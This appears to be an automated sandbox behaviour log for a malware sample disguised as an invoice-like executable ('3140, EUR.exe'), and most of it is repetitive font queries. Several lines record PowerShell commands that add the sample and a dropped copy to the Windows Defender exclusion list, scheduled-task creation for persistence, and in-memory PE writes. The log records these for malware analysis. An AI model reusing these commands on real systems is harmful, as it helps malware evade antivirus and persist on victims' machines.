                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory written: C:\Users\user\Desktop\3140, EUR.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory written: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
